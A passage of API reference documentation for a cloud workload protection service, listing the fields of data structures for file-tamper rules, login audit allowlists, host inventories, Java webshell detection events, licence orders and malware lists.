TargetCreatTime | String | Target File Creation Time Note: This field may return null, indicating that no valid values can be obtained. |
ExePid | Integer | Process PID |
TargetName | String | File name |
Reference | String | Reference link |
Level | Integer | Risk Level. 0: None; 1: High-Risk; 2: Medium-Risk; 3: Low-Risk |
ExeName | String | Process name Note: This field may return null, indicating that no valid values can be obtained. |
MachineExtraInfo | MachineExtraInfo | Host Additional Information Note: This field may return null, indicating that no valid values can be obtained. |
FileAction | String | File threat behavior Note: This field may return null, indicating that no valid values can be obtained. |
Core file monitoring rules
Used by actions: DescribeFileTamperEventRuleInfo, DescribeFileTamperRuleInfo, DescribeMachineFileTamperRules, ModifyFileTamperRule.
Name | Type | Required | Description |
---|---|---|---|
ProcessPath | String | Yes | Process path |
Target | String | Yes | Accessed file path |
Action | String | Yes | Recommended action: skip: skip; alarm: alert |
FileAction | String | No | Monitoring behavior Note: This field may return null, indicating that no valid values can be obtained. |
Information on Number of Host-associated Core File Rules
Used by actions: DescribeFileTamperRuleCount.
Name | Type | Description |
---|---|---|
Uuid | String | Host UUID |
Count | Integer | Number of Association Rules |
Name | String | Name of the Association Rule (Show Only One of Them) Note: This field may return null, indicating that no valid values can be obtained. |
Core File Monitoring Rule Details
Used by actions: DescribeFileTamperEventRuleInfo, DescribeFileTamperRuleInfo.
Name | Type | Description |
---|---|---|
Name | String | Rule name Note: This field may return null, indicating that no valid values can be obtained. |
ModifyTime | String | Update time |
CreateTime | String | Creation time |
Status | Integer | Status. 0: Enabled; 1: Disabled |
Rule | Array of FileTamperRule | Rule |
Uuids | Array of String | Effective Host UUID. Empty means all hosts, and returned number of entries can be controlled through parameters. Note: This field may return null, indicating that no valid values can be obtained. |
Id | Integer | Rule ID |
IsGlobal | Integer | Global Rule or Not (No by Default). 0: No; 1: Yes |
Level | Integer | Risk Level. 0: None; 1: High-Risk; 2: Medium-Risk; 3: Low-Risk |
UuidTotalCount | Integer | Total Number of Effective Hosts |
AddWhiteType | String | Allowlisted processing type Note: This field may return null, indicating that no valid values can be obtained. |
List of core file monitoring rules
Used by actions: DescribeFileTamperRules.
Name | Type | Description |
---|---|---|
Name | String | Rule name Note: This field may return null, indicating that no valid values can be obtained. |
RuleCategory | Integer | Rule Type. 0: System Rule; 1: User Rule |
HostCount | Integer | Number of affected hosts Note: This field may return null, indicating that no valid values can be obtained. |
ModifyTime | String | Update time |
CreateTime | String | Creation time |
Status | Integer | Status. 0: Enabled; 1: Disabled |
Id | Integer | Rule ID, which is set to 0 for system rules |
IsGlobal | Integer | Whether global 0: no; 1: yes |
Level | Integer | Risk Level. 0: None; 1: High-Risk; 2: Medium-Risk; 3: Low-Risk |
WriteRuleCount | Integer | Number of write entries for the sub-rule Note: This field may return null, indicating that no valid values can be obtained. |
ReadRuleCount | Integer | Number of read entries for the sub-rule Note: This field may return null, indicating that no valid values can be obtained. |
ReadWriteRuleCount | Integer | Number of read and write entries for the sub-rule Note: This field may return null, indicating that no valid values can be obtained. |
FileAction | String | Monitoring behavior Note: This field may return null, indicating that no valid values can be obtained. |
AddWhiteType | String | Allowlisted processing type Note: This field may return null, indicating that no valid values can be obtained. |
Description key-value pair filter, which is used for conditional filtering queries. For example, filter by ID, name, and status.
If there are multiple Filters, the logical relationship between them is AND.
If multiple values exist in one filter, the logical relationship between these values is OR.
Used by actions: DescribeAccountStatistics, DescribeAssetMachineList, DescribeAssetPortInfoList, DescribeAssetProcessInfoList, DescribeAssetSystemPackageList, DescribeAssetUserList, DescribeAssetWebAppList, DescribeAssetWebFrameList, DescribeAssetWebLocationList, DescribeAttackEvents, DescribeAttackLogs, DescribeAttackTop, DescribeAttackTrends, DescribeBanWhiteList, DescribeBaselineHostDetectList, DescribeBaselineItemDetectList, DescribeBaselineItemList, DescribeBaselinePolicyList, DescribeBaselineWeakPasswordList, DescribeBashEvents, DescribeBashEventsNew, DescribeBashPolicies, DescribeBashRules, DescribeBruteAttackList, DescribeComponentStatistics, DescribeExportMachines, DescribeHistoryAccounts, DescribeHostLoginList, DescribeIgnoreHostAndItemConfig, DescribeLicenseBindSchedule, DescribeLoginWhiteCombinedList, DescribeLoginWhiteList, DescribeMachineDefenseCnt, DescribeMachineRiskCnt, DescribeMachines, DescribeMachinesSimple, DescribeMalWareList, DescribeMalwareWhiteList, DescribeMalwareWhiteListAffectList, DescribeNetAttackWhiteList, DescribeOpenPortStatistics, DescribePrivilegeRules, DescribeProcessStatistics, DescribeReverseShellEvents, DescribeReverseShellRules, DescribeRiskDnsEventList, DescribeRiskDnsList, DescribeRiskDnsPolicyList, DescribeRiskProcessEvents, DescribeSecurityEventStat, DescribeVulDefenceEvent, DescribeVulDefenceList, DescribeVulDefencePluginDetail, DescribeVulDefencePluginStatus, DescribeVulEffectHostList, DescribeVulEffectModules, DescribeVulStoreList, DescribeWebHookPolicy, DescribeWebHookReceiver, DescribeWebHookRules, ExportAssetMachineList, ExportAssetPortInfoList, ExportAssetProcessInfoList, ExportAssetSystemPackageList, ExportAssetUserList, ExportAssetWebAppList, ExportAssetWebFrameList, ExportAssetWebLocationList, ExportBaselineFixList, ExportBaselineHostDetectList, ExportBaselineItemDetectList, ExportJavaMemShellPlugins, ExportJavaMemShells, ExportNonlocalLoginPlaces, ExportRiskDnsEventList, ExportRiskDnsPolicyList, ExportRiskProcessEvents, ExportVulDefenceEvent, ExportVulDefenceList, ExportVulDefencePluginEvent, ExportVulEffectHostList, ExportVulList, ModifyBaselinePolicy.
Name | Type | Required | Description |
---|---|---|---|
Name | String | Yes | Name of filter key |
Values | Array of String | Yes | One or more filter values |
ExactMatch | Boolean | No | Fuzzy search |
Description of key-value pair filter, which is used for conditional filtering queries. For example, filter by ID, name, and status.
If there are multiple Filters, the logical relationship between them is AND.
If there are multiple Values in the same Filter, the logical relationship between the Values under the same Filter is OR.
Used by actions: DescribeBaselineEffectHostList, DescribeBaselineList, DescribeCanNotSeparateMachine, DescribeEmergencyResponseList, DescribeEmergencyVulList, DescribeExpertServiceList, DescribeExpertServiceOrderList, DescribeFileTamperEvents, DescribeFileTamperRules, DescribeIgnoreRuleEffectHostList, DescribeJavaMemShellList, DescribeJavaMemShellPluginInfo, DescribeJavaMemShellPluginList, DescribeLicenseBindList, DescribeLicenseList, DescribeMachineClearHistory, DescribeMaliciousRequestWhiteList, DescribeRansomDefenseBackupList, DescribeRansomDefenseEventsList, DescribeRansomDefenseMachineList, DescribeRansomDefenseRollBackTaskList, DescribeRansomDefenseStrategyList, DescribeRansomDefenseStrategyMachines, DescribeScanState, DescribeScanTaskDetails, DescribeTags, DescribeVulList, ExportAttackEvents, ExportBaselineEffectHostList, ExportBaselineList, ExportBashEvents, ExportBashEventsNew, ExportBashPolicies, ExportBruteAttacks, ExportFileTamperEvents, ExportFileTamperRules, ExportIgnoreRuleEffectHostList, ExportLicenseDetail, ExportMaliciousRequests, ExportMalwares, ExportPrivilegeEvents, ExportRansomDefenseBackupList, ExportRansomDefenseEventsList, ExportRansomDefenseMachineList, ExportRansomDefenseStrategyList, ExportRansomDefenseStrategyMachines, ExportReverseShellEvents, ExportScanTaskDetails, ExportVulDetectionReport, ModifyEventAttackStatus, ModifyRiskEventsStatus.
Name | Type | Required | Description |
---|---|---|---|
Name | String | Yes | Name of filter key |
Values | Array of String | Yes | One or more filter values |
ExactMatch | Boolean | No | Whether to use fuzzy match. It will be handled by the front-end and can be ignored. |
Configuration for full-text index
Used by actions: DescribeLogIndex.
Name | Type | Description |
---|---|---|
CaseSensitive | Boolean | Whether case-sensitive |
Tokenizer | String | Delimiter |
ContainZH | Boolean | Whether Chinese characters are contained. |
Account change history data
Used by actions: DescribeHistoryAccounts.
Name | Type | Description |
---|---|---|
Id | Integer | Unique ID |
Uuid | String | CWPP client UUID |
MachineIp | String | Private IP address of the host |
MachineName | String | Host name |
Username | String | Username |
ModifyType | String | Account change type |
ModifyTime | Timestamp | Change time |
Host information entity of the log-in audit allowlist
Used by actions: DescribeLoginWhiteHostList.
Name | Type | Description |
---|---|---|
Quuid | String | Yunjing client ID |
Uuid | String | Host ID |
MachineName | String | Machine name |
MachineIp | String | Machine IP address. This parameter is left blank for terminated servers. |
MachineWanIp | String | Public IP address. This parameter is left blank for terminated servers. |
Tags | Array of MachineTag | Tag information array |
Add the host information entity of the log-in audit allowlist.
Used by actions: AddLoginWhiteLists, ModifyLoginWhiteRecord.
Name | Type | Required | Description |
---|---|---|---|
Quuid | String | Yes | Quuid |
Uuid | String | Yes | Uuid |
Log-in audit list entity
Used by actions: DescribeHostLoginList.
Name | Type | Description |
---|---|---|
Id | Integer | Record ID |
Uuid | String | UUID string Note: This field may return null, indicating that no valid values can be obtained. |
MachineIp | String | Host IP Note: This field may return null, indicating that no valid values can be obtained. |
MachineName | String | Host name Note: This field may return null, indicating that no valid values can be obtained. |
UserName | String | Username Note: This field may return null, indicating that no valid values can be obtained. |
SrcIp | String | Source IP Note: This field may return null, indicating that no valid values can be obtained. |
Status | Integer | 1: normal log-in; 2: cross-region log-in; 5: allowlisted; 14: processed; 15: ignored |
Country | Integer | Country/Region ID Note: This field may return null, indicating that no valid values can be obtained. |
City | Integer | City ID Note: This field may return null, indicating that no valid values can be obtained. |
Province | Integer | Province ID Note: This field may return null, indicating that no valid values can be obtained. |
LoginTime | String | Log-in time Note: This field may return null, indicating that no valid values can be obtained. |
ModifyTime | String | Modification time Note: This field may return null, indicating that no valid values can be obtained. |
IsRiskArea | Integer | Whether hit the exception of cross-region log-in: 1: yes; 0: no Note: This field may return null, indicating that no valid values can be obtained. |
IsRiskUser | Integer | Whether hit the exception of abnormal user: 1: yes; 0: no Note: This field may return null, indicating that no valid values can be obtained. |
IsRiskTime | Integer | Whether hit the exception of abnormal time: 1: yes; 0: no Note: This field may return null, indicating that no valid values can be obtained. |
IsRiskSrcIp | Integer | Whether hit the exception of abnormal IP: 1: yes; 0: no Note: This field may return null, indicating that no valid values can be obtained. |
RiskLevel | Integer | Risk level: 0: high 1: suspicious Note: This field may return null, indicating that no valid values can be obtained. |
Location | String | Location name Note: This field may return null, indicating that no valid values can be obtained. |
Quuid | String | Host QUUID Note: This field may return null, indicating that no valid values can be obtained. |
Desc | String | High-risk information description: ABROAD - overseas IP XTI - threat intelligence Note: This field may return null, indicating that no valid values can be obtained. |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
Port | Integer | Request destination port Note: This field may return null, indicating that no valid values can be obtained. |
Add log-in audit allowlist entity
Used by actions: AddLoginWhiteLists.
Name | Type | Required | Description |
---|---|---|---|
Places | Array of Place | Yes | Allowlisted region |
SrcIp | String | Yes | Allowlisted source IP address. IP ranges are supported. Multiple IPs are separated by commas. |
UserName | String | Yes | Allowlisted username separated by commas |
IsGlobal | Integer | Yes | Whether the allowlist is effective globally. 1: all hosts; 0: only a single host. |
HostInfos | Array of HostInfo | Yes | List of information on machines where the allowlist is effective |
Remark | String | No | Remarks |
StartTime | String | No | Start time |
EndTime | String | No | End time |
Host and host tag information
Used by actions: DescribeHostInfo.
Name | Type | Description |
---|---|---|
Quuid | String | Host QUUID Note: This field may return null, indicating that no valid values can be obtained. |
TagList | Array of String | Host tag name array Note: This field may return null, indicating that no valid values can be obtained. |
HostIp | String | Host intranet IP Note: This field may return null, indicating that no valid values can be obtained. |
AliasName | String | Host name Note: This field may return null, indicating that no valid values can be obtained. |
MachineWanIp | String | Host public IP address Note: This field may return null, indicating that no valid values can be obtained. |
Uuid | String | Host UUID Note: This field may return null, indicating that no valid values can be obtained. |
KernelVersion | String | Kernel version number Note: This field may return null, indicating that no valid values can be obtained. |
MachineStatus | String | Host online status: ONLINE; OFFLINE Note: This field may return null, indicating that no valid values can be obtained. |
ProtectType | String | Protection version: BASIC_VERSION - Basic Edition PRO_VERSION - Professional Edition; Flagship: Ultimate Edition Note: This field may return null, indicating that no valid values can be obtained. |
VulNum | Integer | Number of vulnerabilities Note: This field may return null, indicating that no valid values can be obtained. |
CloudTags | Array of Tags | Cloud Tag Information Note: This field may return null, indicating that no valid values can be obtained. |
InstanceID | String | Host Instance ID Note: This field may return null, indicating that no valid values can be obtained. |
Information on the ignored baseline check item
Used by actions: DescribeIgnoreBaselineRule.
Name | Type | Description |
---|---|---|
RuleName | String | Baseline check item name Note: This field may return null, indicating that no valid values can be obtained. |
RuleId | Integer | Baseline check item ID Note: This field may return null, indicating that no valid values can be obtained. |
ModifyTime | String | Update time Note: This field may return null, indicating that no valid values can be obtained. |
Fix | String | Fixing suggestions Note: This field may return null, indicating that no valid values can be obtained. |
EffectHostCount | Integer | Number of affected hosts Note: This field may return null, indicating that no valid values can be obtained. |
Information of hosts affected by ignoring detection items
Used by actions: DescribeIgnoreRuleEffectHostList.
Name | Type | Description |
---|---|---|
HostName | String | Host name Note: This field may return null, indicating that no valid values can be obtained. |
Level | Integer | Severity level: 1: low-risk; 2: medium-risk; 3: high-risk; 4: critical Note: This field may return null, indicating that no valid values can be obtained. |
TagList | Array of String | Host tag array Note: This field may return null, indicating that no valid values can be obtained. |
Status | Integer | Status: 0: failed; 1: ignore; 3: passed; 5: detecting Note: This field may return null, indicating that no valid values can be obtained. |
LastScanTime | String | Last check time Note: This field may return null, indicating that no valid values can be obtained. |
EventId | Integer | Event ID Note: This field may return null, indicating that no valid values can be obtained. |
Quuid | String | Host QUUID Note: This field may return null, indicating that no valid values can be obtained. |
Event point information
Used by actions: DescribeAlarmIncidentNodes.
Name | Type | Description |
---|---|---|
IncidentId | String | Event ID Note: This field may return null, indicating that no valid values can be obtained. |
TableName | String | The name of the table where the event occurred Note: This field may return null, indicating that no valid values can be obtained. |
Vertex | Array of VertexInfo | A list of node information, with array items containing detailed node information Note: This field may return null, indicating that no valid values can be obtained. |
VertexCount | Integer | Total number of nodes Note: This field may return null, indicating that no valid values can be obtained. |
Java webshell event details
Used by actions: DescribeJavaMemShellInfo.
Name | Type | Description |
---|---|---|
InstanceName | String | Container name |
InstanceState | String | Instance Status: RUNNING, STOPPED, SHUTDOWN... |
PrivateIp | String | Private IP address |
PublicIp | String | Public IP |
Type | Integer | Memory Trojan Type. 0: Filter Type; 1: Listener Type; 2: Servlet Type; 3: Interceptors Type; 4: Agent Type; 5: Other |
Description | String | Description |
CreateTime | String | First detection time |
RecentFoundTime | String | Last detection time |
Status | Integer | Processing Status. 0 - Pending; 1 - Allowlisted; 2 - Deleted; 3 - Ignored; 4 - Manually Processed |
ClassLoaderName | String | Java Loader Class Name |
SuperClassName | String | Parent class name |
Md5 | String | Class file MD5 |
Interfaces | String | Inherited API |
Annotations | String | Annotation |
Pid | Integer | Process ID |
Exe | String | Java Process Path |
Args | String | Java process command line parameters |
ClassName | String | Class name |
ClassContent | String | Java Memory Horse Binary Code (base64) |
ClassContentPretty | String | Java Memory Trojan Decompilation Code |
EventDescription | String | Event description |
SecurityAdvice | String | Security advice |
MachineExtraInfo | MachineExtraInfo | Additional host information Note: This field may return null, indicating that no valid values can be obtained. |
MachineState | String | Instance status: RUNNING, STOPPED, SHUTDOWN... |
Java webshell event information
Used by actions: DescribeJavaMemShellList.
Name | Type | Description |
---|---|---|
Id | Integer | Event ID |
Alias | String | Server name Note: This field may return null, indicating that no valid values can be obtained. |
HostIp | String | Server IP address Note: This field may return null, indicating that no valid values can be obtained. |
Type | Integer | Memory Trojan Type. 0: Filter Type; 1: Listener Type; 2: Servlet Type; 3: Interceptors Type; 4: Agent Type; 5: Other |
Description | String | Description |
CreateTime | String | First detection time |
RecentFoundTime | String | Last detection time |
Status | Integer | Processing Status. 0 - Pending; 1 - Allowlisted; 2 - Deleted; 3 - Ignored; 4 - Manually Processed |
Quuid | String | Server QUUID |
MachineExtraInfo | MachineExtraInfo | Host Additional Information Note: This field may return null, indicating that no valid values can be obtained. |
Uuid | String | Server UUID Note: This field may return null, indicating that no valid values can be obtained. |
Java Memory Trojan Plugin Information
Used by actions: DescribeJavaMemShellPluginInfo.
Name | Type | Description |
---|---|---|
Pid | Integer | Injection Process PID |
MainClass | String | Injection Process Main Class |
Status | Integer | Injection Status. 0: Injecting; 1: Injection Succeeded; 2: Plugin Timeout; 3: Plugin Exits; 4: Injection Failed; 5: Soft-delete |
ErrorLog | String | Error logs |
Java Memory Trojan Plugin Configuration
Used by actions: DescribeJavaMemShellPluginList.
Name | Type | Description |
---|---|---|
Quuid | String | Container QUUID |
Alias | String | Server name |
HostIp | String | Server IP address |
JavaShellStatus | Integer | Javashell Plugin Switch. 0: Off; 1: On |
Exception | Integer | Plugin Exception Status. 0: Normal; 1: Abnormal |
CreateTime | String | Creation time |
ModifyTime | String | Modification time |
Uuid | String | Server UUID Note: This field may return null, indicating that no valid values can be obtained. |
MachineExtraInfo | MachineExtraInfo | Host Additional Information Note: This field may return null, indicating that no valid values can be obtained. |
Index key-value information
Used by actions: DescribeLogIndex.
Name | Type | Description |
---|---|---|
Key | String | Field requiring Key-Value or Meta Field Index configuration |
Value | ValueInfo | Field index description |
Key-value index configuration
Used by actions: DescribeLogIndex.
Name | Type | Description |
---|---|---|
CaseSensitive | Boolean | Whether case-sensitive |
KeyValues | Array of KeyValueArrayInfo | Information about the key-value pair to be indexed Note: This field may return null, indicating that no valid values can be obtained. |
Authorize binding details
Used by actions: DescribeLicenseBindList.
Name | Type | Description |
---|---|---|
MachineName | String | Machine Alias |
MachineWanIp | String | Machine Public IP address |
MachineIp | String | Machine Private IP address |
Quuid | String | CVM UUID |
Uuid | String | CWPP client UUID |
Tags | Array of String | Tag information |
AgentStatus | String | CWPP client status: OFFLINE, ONLINE, and UNINSTALL. |
IsUnBind | Boolean | Whether unbinding is allowed: false - unbinding is not allowed. |
IsSwitchBind | Boolean | Whether rebinding is allowed: false - rebinding is not allowed. |
MachineExtraInfo | MachineExtraInfo | Host Additional Information Note: This field may return null, indicating that no valid values can be obtained. |
Authorization binding task details
Used by actions: DescribeLicenseBindSchedule.
Name | Type | Description |
---|---|---|
Quuid | String | CVM UUID |
ErrMsg | String | Error message |
Status | Integer | 0-in progress; 1-succeeded; 2-failed |
FixMessage | String | Fix suggestion |
MachineExtraInfo | MachineExtraInfo | Additional information of machine Note: This field may return null, indicating that no valid values can be obtained. |
Authorization order list object
Used by actions: DescribeLicenseList.
Name | Type | Description |
---|---|---|
LicenseId | Integer | Authorization ID |
LicenseType | Integer | Authorization type. 0: Pro Edition - pay-as-you-go; 1: Pro Edition - monthly subscription; 2: Ultimate Edition - monthly subscription. |
LicenseStatus | Integer | Authorization status. 0: not in use; 1: partially in use; 2: used up; 3: unavailable. Note: This field may return null, indicating that no valid values can be obtained. |
LicenseCnt | Integer | Total number of authorizations |
UsedLicenseCnt | Integer | Number of used authorizations |
OrderStatus | Integer | Order status. 1: normal; 2: isolated; 3: terminated. |
Deadline | String | Deadline |
ResourceId | String | Order resource ID |
AutoRenewFlag | Integer | 0: initialization; 1: automatic renewal; 2: no automatic renewal. |
ProjectId | Integer | Project ID |
TaskId | Integer | Task ID. Default value: 0. It is used to query the binding progress. |
BuyTime | String | Time of purchase |
SourceType | Integer | Whether the order is a trial order |
Alias | String | Resource alias |
Tags | Array of Tags | Platform Tag Note: This field may return null, indicating that no valid values can be obtained. |
FreezeNum | Integer | Number of frozen authorizations. 0: no authorization is frozen; other values: actual number of frozen authorizations. Note: This field may return null, indicating that no valid values can be obtained. |
Authorization Order Object Content
Used by actions: DescribeMachinesSimple.
Name | Type | Description |
---|---|---|
LicenseId | Integer | Authorization ID |
LicenseType | Integer | Authorization type |
Status | Integer | Authorization Order Resource Status |
SourceType | Integer | Order type |
ResourceId | String | Resource ID |
Result details of statistics within the histogram period
Used by actions: DescribeLogHistogram.
Name | Type | Description |
---|---|---|
Count | Integer | Number of logs within the statistical period |
TimeStamp | Integer | Unix timestamp rounded by period, in ms |
Log details
Used by actions: SearchLog.
Name | Type | Description |
---|---|---|
Content | String | JSON serialized string of the log content |
FileName | String | Log file name |
Source | String | Log source IP address |
TimeStamp | Integer | Log time, in milliseconds |
Record of stored log size
Used by actions: DescribeLogStorageRecord.
Name | Type | Description |
---|---|---|
Month | String | Year and month Note: This field may return null, indicating that no valid values can be obtained. |
UsedSize | Integer | Used storage capacity, in bytes Note: This field may return null, indicating that no valid values can be obtained. |
InquireSize | Integer | Total capacity, in bytes Note: This field may return null, indicating that no valid values can be obtained. |
Merge cross-region log-in allowlists
Used by actions: DescribeLoginWhiteCombinedList.
Name | Type | Description |
---|---|---|
Places | Array of Place | Allowlist region Note: This field may return null, indicating that no valid values can be obtained. |
UserName | String | Allowlisted users (Multiple users are separated by commas.) |
SrcIp | String | Allowlisted IPs (Multiple IPs are separated by commas.) |
Locale | String | Region string |
Remark | String | Remarks |
StartTime | String | Start time |
EndTime | String | End time |
IsGlobal | Integer | Whether the settings take effect globally. 1: take effect globally; 0: take effect on the specified host list. |
Name | String | Allowlist name. If IsLocal is set to 1, the name is fixed as All servers. If the allowlist applies to only a single server, the name is the server's private IP Address. If the allowlist applies to multiple servers, the name is the number of servers, such as 11. |
Desc | String | Return the server name when the allowlist applies to only one server. |
Id | Integer | Allowlist ID |
CreateTime | String | Creation time |
ModifyTime | String | Last modification time |
Uuid | String | Server UUID |
Locations | String | Login Location |
Cross-region log-in allowlist
Used by actions: DescribeLoginWhiteList.
Name | Type | Description |
---|---|---|
Id | Integer | Record ID |
Uuid | String | Yunjing client ID |
Places | Array of Place | Allowlisted regions |
UserName | String | Allowlisted users (Multiple users are separated by commas.) |
SrcIp | String | Allowlisted IPs (Multiple IPs are separated by commas.) |
IsGlobal | Boolean | Whether a global rule |
CreateTime | Timestamp | Time of creating the allowlist |
ModifyTime | Timestamp | Time of modifying the allowlist |
MachineName | String | Machine name |
HostIp | String | Machine IP |
StartTime | String | Start time |
EndTime | String | End time |
Host list
Used by actions: DescribeMachines.
Name | Type | Description |
---|---|---|
MachineName | String | Host name. |
MachineOs | String | Host System. |
MachineStatus | String | Host status |
Uuid | String | Yunjing client UUID. If the client is offline for a long time, an empty string is returned. |
Quuid | String | CVM or BM Machine Unique UUID. |
VulNum | Integer | Number of vulnerabilities |
MachineIp | String | Host IP. |
IsProVersion | Boolean | Whether the edition is Pro Edition |
MachineWanIp | String | Public IP address of a host |
PayMode | String | Host status |
MalwareNum | Integer | Number of Trojans |
Tag | Array of MachineTag | Tag information |
BaselineNum | Integer | Number of baseline risks |
CyberAttackNum | Integer | Number of network risks |
SecurityStatus | String | Risk status |
InvasionNum | Integer | Number of intrusion events |
RegionInfo | RegionInfo | Region information |
InstanceState | String | Instance status: TERMINATED_PRO_VERSION - terminated |
LicenseStatus | Integer | Tamper-proof; authorization status: 1 - authorized; 0 - unauthorized |
ProjectId | Integer | Project ID |
HasAssetScan | Integer | Whether there is an available asset scanning API: 0 - no; 1 - yes |
MachineType | String | Machine Zone Type. CVM - Cloud Virtual Machine; BM: Bare Metal; ECM: Edge Computing Machine; LH: Lightweight Application Server; Other: Hybrid Cloud Zone |
KernelVersion | String | Kernel version |
ProtectType | String | Protection version: BASIC_VERSION - Basic Edition; PRO_VERSION - Professional Edition; Flagship - Ultimate Edition; GENERAL_DISCOUNT - Inclusive Edition |
CloudTags | Array of Tags | Cloud Tag Information Note: This field may return null, indicating that no valid values can be obtained. |
IsAddedOnTheFifteen | Integer | Whether a host added within the last 15 days: 0: no; 1: yes Note: This field may return null, indicating that no valid values can be obtained. |
IpList | String | Host IP List Note: This field may return null, indicating that no valid values can be obtained. |
VpcId | String | Network Note: This field may return null, indicating that no valid values can be obtained. |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
InstanceId | String | Instance ID |
Remark | String | Remarks Note: This field may return null, indicating that no valid values can be obtained. |
Machine Cleanup Record Object
Used by actions: DescribeMachineClearHistory.
Name | Type | Description |
---|---|---|
Id | Integer | ID Value |
InstanceId | String | Instance ID |
InstanceName | String | Instance name |
PublicIp | String | Public IP address |
PrivateIp | String | Private IP address |
AgentLastOfflineTime | String | Client Last Offline Time |
CreateTime | String | Creation time |
Server Basic Information
Used by actions: DescribeAssetAppList, DescribeAssetCoreModuleList, DescribeAssetDatabaseList, DescribeAssetEnvList, DescribeAssetInitServiceList, DescribeAssetJarList, DescribeAssetMachineDetail, DescribeAssetMachineList, DescribeAssetPlanTaskList, DescribeAssetPortInfoList, DescribeAssetProcessInfoList, DescribeAssetSystemPackageList, DescribeAssetUserList, DescribeAssetWebAppList, DescribeAssetWebFrameList, DescribeAssetWebLocationList, DescribeAssetWebServiceInfoList, DescribeAttackEventInfo, DescribeAttackEvents, DescribeAttackLogs, DescribeBaselineHostDetectList, DescribeBaselineItemList, DescribeBashEventsNew, DescribeBruteAttackList, DescribeDefenceEventDetail, DescribeFileTamperEvents, DescribeHostLoginList, DescribeIgnoreHostAndItemConfig, DescribeJavaMemShellInfo, DescribeJavaMemShellList, DescribeJavaMemShellPluginList, DescribeLicenseBindList, DescribeLicenseBindSchedule, DescribeMachines, DescribeMalWareList, DescribeMalwareInfo, DescribeReverseShellEvents, DescribeRiskDnsEventInfo, DescribeRiskDnsEventList, DescribeRiskProcessEvents, DescribeScanTaskDetails, DescribeScreenMachines, DescribeVulDefenceEvent, DescribeVulEffectHostList.
Name | Type | Description |
---|---|---|
WanIP | String | Public IP address Note: This field may return null, indicating that no valid values can be obtained. |
PrivateIP | String | Private IP address Note: This field may return null, indicating that no valid values can be obtained. |
NetworkType | Integer | Network Type. 1: VPC network; 2: Basic Network; 3: Non-Tencent Cloud Network Note: This field may return null, indicating that no valid values can be obtained. |
NetworkName | String | Network Name, returns vpc_id in the case of a VPC network Note: This field may return null, indicating that no valid values can be obtained. |
InstanceID | String | Instance ID Note: This field may return null, indicating that no valid values can be obtained. |
HostName | String | Host name Note: This field may return null, indicating that no valid values can be obtained. |
Query Details of Host-related Core File Monitoring Rules
Used by actions: DescribeMachineFileTamperRules.
Name | Type | Description |
---|---|---|
Name | String | Rule name Note: This field may return null, indicating that no valid values can be obtained. |
RuleCategory | Integer | Rule Type. 0: System Rule; 1: User Rule |
Rule | Array of FileTamperRule | Rule |
Id | Integer | Unique ID |
Information on the authorization bound to the machine
Used by actions: DescribeMachineLicenseDetail.
Name | Type | Description |
---|---|---|
Quuid | String | Host QUUID |
PayMode | Integer | xx |
ResourceId | String | xxx |
InquireKey | String | xxx |
SourceType | Integer | xxx |
Host List Shuttle Box
Used by actions: DescribeMachinesSimple.
Name | Type | Description |
---|---|---|
MachineName | String | Host name. |
MachineOs | String | Host System. |
Uuid | String | Yunjing client UUID. If the client is offline for a long time, an empty string is returned. |
Quuid | String | CVM or BM Machine Unique UUID. |
MachineIp | String | Host IP. |
IsProVersion | Boolean | Whether the edition is Pro Edition |
MachineWanIp | String | Public IP address of the host |
PayMode | String | Host status |
Tag | Array of MachineTag | Tag information |
RegionInfo | RegionInfo | Region information |
InstanceState | String | Instance status. TERMINATED_PRO_VERSION: terminated. |
ProjectId | Integer | Project ID |
MachineType | String | Machine Zone Type. CVM - Cloud Virtual Machine; BM: Bare Metal; ECM: Edge Computing Machine; LH: Lightweight Application Server; Other: Hybrid Cloud Zone |
KernelVersion | String | Kernel version |
ProtectType | String | Protection Edition. BASIC_VERSION: Basic Edition; PRO_VERSION: Professional Edition; Flagship: Premium Edition; GENERAL_DISCOUNT: General Discount Edition |
LicenseOrder | LicenseOrder | Authorization order object Note: This field may return null, indicating that no valid values can be obtained. |
CloudTags | Array of Tags | Cloud Tag Information Note: This field may return null, indicating that no valid values can be obtained. |
InstanceId | String | Instance ID Note: This field may return null, indicating that no valid values can be obtained. |
Machine snapshot information
Used by actions: DescribeMachineSnapshot.
Name | Type | Description |
---|---|---|
Quuid | String | cvm id |
HostName | String | Host name |
HostIp | String | Host IP address |
SnapshotName | String | Snapshot name |
CreateTime | String | Snapshot creation time |
DiskId | String | Disk ID |
InstanceId | String | Instance ID |
RegionId | Integer | Region ID |
SnapshotId | String | Snapshot ID |
Server tag information
Used by actions: DescribeAssetAppList, DescribeAssetDatabaseList, DescribeAssetMachineList, DescribeAssetPortInfoList, DescribeAssetProcessInfoList, DescribeAssetWebAppList, DescribeAssetWebFrameList, DescribeAssetWebLocationList, DescribeAssetWebServiceInfoList, DescribeLoginWhiteHostList, DescribeMachines, DescribeMachinesSimple, DescribeRansomDefenseMachineList, DescribeRansomDefenseStrategyMachines.
Name | Type | Description |
---|---|---|
Rid | Integer | Associated tag ID |
Name | String | Tag name |
TagId | Integer | Tag ID |
Trojan list
Used by actions: DescribeMalWareList.
Name | Type | Description |
---|---|---|
HostIp | String | Server IP address |
Uuid | String | UUID |
FilePath | String | Path |
VirusName | String | Description |
Status | Integer | Status: 4-Pending, 5-Trusted, 6-Isolated, 8-Files Deleted, 14-Processed. |
Id | Integer | Unique ID Note: This field may return null, indicating that no valid values can be obtained. |
Alias | String | Host alias |
Tags | Array of String | Feature tag. This field has been deprecated, and no tag will be returned. Tags are returned in the details. Note: This field may return null, indicating that no valid values can be obtained. |
FileCreateTime | String | First running time Note: This field may return null, indicating that no valid values can be obtained. |
FileModifierTime | String | Last running time Note: This field may return null, indicating that no valid values can be obtained. |
CreateTime | String | Creation time |
LatestScanTime | String | Last scan time |
Level | Integer | Risk level. 0: unknown; 1: low; 2: medium; 3: high; 4: critical. |
CheckPlatform | String | Trojan detection platforms, separated with commas. 1: cloud security engine; 2: TAV; 3: BinaryAI; 4: abnormal behavior; 5: threat intelligence. |
ProcessExists | Integer | Whether the Trojan process exists. 0: no; 1: yes. |
FileExists | Integer | Whether the Trojan file exists. 0: no; 1: yes. |
Quuid | String | cvm quuid |
MD5 | String | Trojan sample MD5 |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
Malicious request allowlist information
